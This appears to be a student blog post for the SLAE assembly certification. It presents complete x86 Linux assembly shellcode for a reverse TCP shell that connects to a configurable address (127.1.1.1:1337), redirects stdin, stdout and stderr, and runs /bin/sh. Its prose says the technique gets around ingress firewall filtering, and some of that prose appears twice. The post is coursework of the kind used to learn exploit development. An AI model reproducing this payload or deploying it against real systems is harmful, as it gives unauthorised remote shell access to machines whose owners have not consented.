Assignment #2: Create Shell_Reverse_TCP shellcode
In this assignment our goal is to create a reverse tcp shell.
The main difference between a bind tcp shell and a reverse tcp shell is instead of setting the socket to
sys_listen(), and sys_accept the socket is set to sys_connect.
The advantage over setting the socket to sys_connect vs (sys_listen, sys_accept) is we can force a system to remotely connect to a specified ip address and port, which allows us to obtain access to a system that is behind a firewall, that is filtering for ingress traffic.
The image below is an example of the reverse tcp shell created for this assignment.
The following is the reverse tcp shell written for this assignment:
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32
The main difference between a bind tcp shell and a reverse tcp shell is instead of setting the socket to
sys_listen(), and sys_accept the socket is set to sys_connect.
The advantage over setting the socket to sys_connect vs (sys_listen, sys_accept) is we can force a system to remotely connect to a specified ip address and port, which allows us to obtain access to a system that is behind a firewall, that is filtering for ingress traffic.
The image below is an example of the reverse tcp shell created for this assignment.
The following is the reverse tcp shell written for this assignment:
| global _start | |
| section .text | |
| _start: | |
| ; int socketcall(int call, unsigned long *args) | |
| ; sockfd = socket(int socket_family, int socket_type, int protocol) | |
| sub ebx, ebx | |
| mov ecx, ebx | |
| mul ecx | |
| sub esp, 12 | |
| mov dword [esp+0x8], ebx ; IP_PROTO 0 | |
| mov dword [esp+0x4], 0x1 ; SOCK_STREAM 1 | |
| mov dword [esp], 0x2 ; AF_INET 2 | |
| mov ecx, esp ; move struct pointer into ECX | |
| mov eax, 0x66 | |
| inc ebx | |
| int 0x80 | |
| xchg esi, eax ; ESI --> SOCKFD | |
| ; int socketcall(int call, unsigned long *args) | |
| ; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) | |
| inc ebx ; 0x1 becomes 0x2 AF_INET (0x2) | |
| push 0x0101017F ; sin_addr.s_addr = 127.1.1.1 | |
| push word 0x3905 ; sin_port = htons(1337) | |
| push bx ; push 0x2 (AF_INET) | |
| inc ebx ; 0x2 becomes 0x3 (SYS_CONNECT) | |
| mov ecx, esp ; move struct pointer into ECX | |
| push 0x10 ; sizeof (sockaddr) | |
| push ecx ; pointer sockaddr | |
| push esi ; push sockfd onto the stack | |
| mov ecx, esp ; pointer to args on the stack into ecx | |
| mov eax, 0x66 ; socketcall() | |
| int 0x80 | |
| xchg ebx, esi ; EBX --> SOCKFD | |
| sub ecx, ecx | |
| mov cl, 0x2 | |
| loop: | |
| mov al, 0x3f ; SYS_DUP2 syscall | |
| int 0x80 ; call SYS_DUP2 | |
| dec ecx ; decrement loop counter | |
| jns loop ; if sign flag is not set keep looping | |
| xor edx, edx | |
| push edx ; NULL string terminator | |
| push 0x68732f2f ; hs// | |
| push 0x6e69622f ; nib/ | |
| mov ecx, edx ; null | |
| mov ebx, esp ; pointer to args into ebx | |
| mov al, 0x0b ; execve systemcall | |
| int 0x80 |
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32
Comments
Post a Comment